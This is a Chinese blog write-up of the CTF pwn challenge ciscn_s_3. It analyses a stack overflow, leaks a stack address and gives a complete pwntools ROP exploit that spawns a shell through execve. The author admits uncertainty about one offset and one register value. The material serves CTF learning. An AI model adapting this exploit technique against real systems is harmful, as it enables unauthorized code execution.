【CTF】【PWN】ciscn_s_3题解

最新推荐文章于 2023-06-29 21:29:55 发布
最新推荐文章于 2023-06-29 21:29:55 发布
阅读量725 收藏 1
点赞数 1
文章标签: pwn unctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_50819561/article/details/120424957
版权

前置知识:
64位系统:
传参方式:首先将系统调用号 传入 rax,然后将参数从左到右依次存入 rdi,rsi,rdx寄存器中,返回值存在rax寄存器
调用号:sys_read 的调用号为0,sys_write 的调用号 为1
stub_execve 的调用号为59,stub_rt_sigreturn 的调用号为15
调用方式: 使用 syscall 进行系统调用
首先惯例checksec一下。发现NX保护开了。
在这里插入图片描述
用IDA打开文件之后返现main函数里面套了一个vuln函数。跟进去查看如下
在这里插入图片描述
tab转汇编之后可以看到vuln函数的汇编代码如下
在这里插入图片描述
vuln函数通过rax和自身的异或,使得rax寄存器里的内容为0(也就是read的系统调用号)。然后通过对rdx,rsi和rdi的赋值。得到了下面的结果:read(rdi,buf,0x400),然后在进行syscall。同理,下面得到的结果是write(rdi,buf,0x30)。其中buf的大小为0x10.
这里很明显有一个溢出漏洞,buf的大小为0x10.但是read和write的操作大小为0x400和0x30.也就是说,通过我们的输入,可以溢出0x20大小的栈内容。

继续分析,发现有一个gadgets函数。
在这里插入图片描述
跟进之后发现这一行汇编代码:mov rax,3BH。3Bh转换成十进制是59.59是
execv的系统调用号。
那么我们的思路就很明显了。构造execv(‘/bin/sh’,0,0),再通过syscall执行execv。布局如下:
rax=59;rdi=’/bin/sh’;rsi=0,rdx=0.最后进行syscall。

首先我们通过第一个payload泄露/bin/sh的地址。因为buf大小为0x10。所以我们构造的payload应该像这样:
](https://img-blog.csdnimg.cn/3c029473d72f4f9cb1aa31ab8635b971.png)
我们为了得到/bin/sh的地址,先要想办法计算偏移。

我们先在等待输入的时候输入aaaa,然后search aaaa。
在这里插入图片描述
得到了我们输入字符串的地址,查看地址之后得到如下结果:
在这里插入图片描述
可以看到我们输入的aaaa所在地址为dcf0
在这里插入图片描述
刚进入的时候的RSI存的是栈地址。也就是offset=0xde18-0xdcf0=0x128.发现就是在我们输入aaaa后泄露的dd10地址就是我们要找的栈地址。

send payload之后,我们先recv0x20大小的内容,然后后面的8字节内容-0x128便是我们输入的/bin/sh所在地址,如下:
在这里插入图片描述
接下来便是构造execv的参数。
在这里插入图片描述
汇编语言里没有找到对rdx,rsi,rdi进行直接操作的代码,但是有上面这段先对r13,r14,r15进行赋值,然后将值传递给相应寄存器的代码。
既然我们要把rdx,rsi设置为0,就要把r13,r14设置为0.r15设置为/bin/sh
在这里插入图片描述
但是有一点我不是很明白,就是为什么r12要赋值为bin_sh_addr+0x50,如果是需要一个返回接下面操作,为什么不直接找一个retn呢?这点有待探究。
完整WP如下:`from pwn import *
from LibcSearcher import *
#r=remote(‘node4.buuoj.cn’, 27543)
r=process(‘a’)
elf=ELF(’./a’)
#context.log_level=‘debug’
#context.terminal = [‘tmux’,‘splitw’,’-h’]
#gdb.attach(proc.pidof®[0],gdbscript=“b main”)
main=0x0004004ed
execv=0x0004004e2
pop_rdi=0x4005a3
pop_rbx_rbp_r12_r13_r14_r15=0x40059A
mov_rdx_r13_call=0x400580
sys=0x400517
ret_addr=0x00000000004003a9
payload=’/bin/sh\x00’*2+p64(main)
r.sendline(payload)
r.recv(0x20)
bin_sh_addr=u64(r.recv(8))-0x128
print(hex(bin_sh_addr))
xxx=0x4004e2
payload=’/bin/sh\x00’+‘a’*8
payload+=p64(pop_rbx_rbp_r12_r13_r14_r15)

payload+=p64(0)*2
payload+=p64(bin_sh_addr+0x50)
payload+=p64(0)*3
payload+=p64(mov_rdx_r13_call)+p64(execv)

payload+=p64(pop_rdi)+p64(bin_sh_addr)+p64(sys)

payload+=p64(main)
r.send(payload)
r.interactive()`
参考了很多师傅的WP,还有一点就是,我本地程序offset是0x128,但是打远程的时候只有0x118能打通,可能是远程出错了?

永远在深夜里就好了
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 7
    评论
2023全国大学生信息安全竞赛(ciscn)初赛题解
返璞归真的博客
05-28 9440
2023全国大学生信息安全竞赛(ciscn)部分题解
[2024CISCN]国赛初赛WEB题目复现_2024国赛初赛unzip题目复现
最新发布
m0_74918915的博客
04-12 1486
其中返回机器的硬件地址(MAC地址),而返回特定于平台的唯一ID。4.: 将所有上述信息串联并进行哈希,得到一个SHA1哈希值。这里,函数将公开信息和私有信息合并为一个序列,然后这个序列中的每一项都被加入到哈希中。添加了一个额外的“salt”值,以确保最终的哈希值是独特的。5.将哈希值转换为16进制的字符串形式,并从中取出前20个字符。然后,它前面添加了"__wzd"前缀来生成最终的。再通过查找关键字,找到set_cookie方法。
2023华中赛区ciscn部分wp
qq_42557115的博客
06-29 2160
今年ciscn华中的CTF还行,基本上都肝出来了,拿了个前十,但是awd拿了个倒一....综合一下拿了个第三,可恶,错失国防科技大学参观机会()把CTF的wp写一下,供大家参考。赛题不分上下午场了。
SROP学习 smallest & ciscn_s_3
红叶的博客
03-19 449
SROP学习,例题 smallest ,ciscn_s_3
ciscn的简介
weixin_33840661的博客
03-31 1136
www.ciscn.cn 全国大学生信息安全竞赛官网教育部按照《教育部关于进一步加强信息安全学科、专业建设和人才培养工作的意见》(教高〔2005〕7号)的要求及《教育部关于成立2006-2010年教育部高等学校有关科类教学指导委员会的通知》(教高函〔2005〕25号)的有关工作安排,为加强教育部对高等学校信息安全人才培养工作的宏观指导与管理,充分发挥专家学者对信息安全...
全国大学生信息安全竞赛(CISCN)-reverse-复现(部分)
ookami6497的博客
06-06 992
CISCN
CTF_snow_隐写工具
05-19
CTF_snow_隐写工具,找了好久才找到,非常好用,打CTF比赛必备!!!
ctf-tools-linux-master_ctf工具_ctf工具_CTFtools_CTF_Tools_
10-01
CTF常用小工具你值得拥有那个。。。。111
pwn_debug:旨在帮助快速构建对CTF Pwn游戏的利用
05-14
pwn_debug-基于pwntools的ctf pwns的辅助调试工具 建议您在获得“用法和安装”的完整说明。 这只是一个简单的描述。 入门 安装pwn_debug git clone https://github.com/ray-cp/pwn_debug.git cd pwn_debug sudo ...
ctf脚本_ctfpy脚本_ctf跑脚本_ctf_ctf脚本密码_
09-30
ctf 密码学 脚本 合集 非常 nice
CTF_AWD_Platform:CTF 攻防对抗平台
05-03
开发目的即一款优秀的专用于比赛的CTF平台,它丰富的比赛内容,灵活的比赛模式以及各项人性化的功能模块满足了比赛举办者的所有要求。然而,同时并不局限于比赛的用途,使用者同样可以用来练习CTF解题和靶机攻防。...
ciscn 2018 部分writeup
StriveBen的博客
05-07 3869
ciscn 2018 部分writeup flag in your hand 这是一道js解密的题目: 发现checkToken函数数里返回的s===”FAKE-TOKEN”,使用这个字符串却得到wrong,而且ic后面被更改了: 跟踪bm函数: 这里charCodeAt() 方法可返回指定位置的字符的 Unicode 编码; 在ck函数里,ic的值又被更改了,所以要想...
第十六届全国大学生信息安全竞赛创新实践能力赛(CISCN
Welcome To Myon'Blog !
05-27 1795
第十六届全国大学生信息安全竞赛创新实践能力赛(CISCN) Misc 1、被加密的生产流量 Crypto 2、Sign_in_passwd Web 3、unzip 4、dumpit Re 5、babyRE Pwn 6、funcanary
PWN-PRACTICE-BUUCTF-7
P1umH0的博客
08-07 178
PWN-PRACTICE-BUUCTF-7jarvisoj_fmciscn_2019_s_3bjdctf_2020_babystack2[HarekazeCTF2019]baby_rop2 jarvisoj_fm ciscn_2019_s_3 bjdctf_2020_babystack2 [HarekazeCTF2019]baby_rop2
BUUCTF ciscn_2019_s_3 对于零基础小白很烧脑的一道入门题
weixin_44447516的博客
08-25 237
pwn buuctf ciscn_2019_s_3 入门
ciscn_2019_s_3
m0_48127441的博客
04-07 164
pwn题目主要是为了获得flag文件 一般使用 syscall(exec) 获得shell 或者使用open + read 获得文件内容 syscall(rax= 0x3B, rdi = '/bin/sh', rsi = 0x0, rdx = 0x0) //execve 函数调用syscall system函数调用execve函数 因为封装过,调用参数有所变化,保护机制也有所区别 该题能栈溢出,但是不知道栈地址 发现正常输出(输入小于0x10的数据时),会讲rsi地...
[漏洞分析] 栈基础 & 栈溢出 & 栈溢出进阶
Poo_Chai的博客
10-27 1274
[漏洞分析]栈基础 & 栈溢出 & 栈溢出进阶 栈基础 内存四区 代码区(.text):这个区域存储着被装入执行的二进制机器代码,处理器会到这个区域取指令执行。 数据区(.data):用于存储全局变量和静态变量等。 堆区:动态地分配和回收内存,进程可以在堆区动态地请求一定大小的内存,并在用...
Pwn学习历程(1)--基本工具、交互、调试
热门推荐
Aka丶的博客
12-02 5万+
1、 从基础开始1.1 简单原理介绍以下内容摘自Wiki:   Pwn是一个骇客语法的俚语词,自”own”这个字引申出来的,这个词的含意在于,玩家在整个游戏对战中处在胜利的优势,或是说明竞争对手处在完全惨败的情形下,这个词习惯上在网络游戏文化主要用于嘲笑竞争对手在整个游戏对战中已经完全被击败(例如:”You just got pwned!”)。   在骇客行话里,尤其在另外一种电脑技术方面,包
pwn ciscn_2019_s_3
beaster1的博客
03-23 191
pwn ciscn_2019_s_3(srop) checksec一下发现是64位文件 并只开了NX保护 打开IDA 进入main函数直接转到vuln(可以看到明显栈溢出var_10距离rpb 0x10) 发现有两个系统调用号,系统调用号的传参方式是先将调用号传入rax,然后参数依次从左至右传入rdi,rsi,rdx寄存器中,最后返回值存入rax 看到最后有点奇怪开始时pop rbp mov rbp,rsp 程序结束的时候直接是:retn(pop rip) 这里直接就跳出vuln函数了 所以r
ctf_awd_platform
10-23
CTF(Capture The Flag)即夺旗赛,是一种网络安全竞赛形式。AWD(Attack-Defense)平台是一种特殊的CTF比赛平台,主要专注于攻击和防御的技能训练与比拼。 ctf_awd_platform是指一种特定的AWD平台,其目的是为了...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 7
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值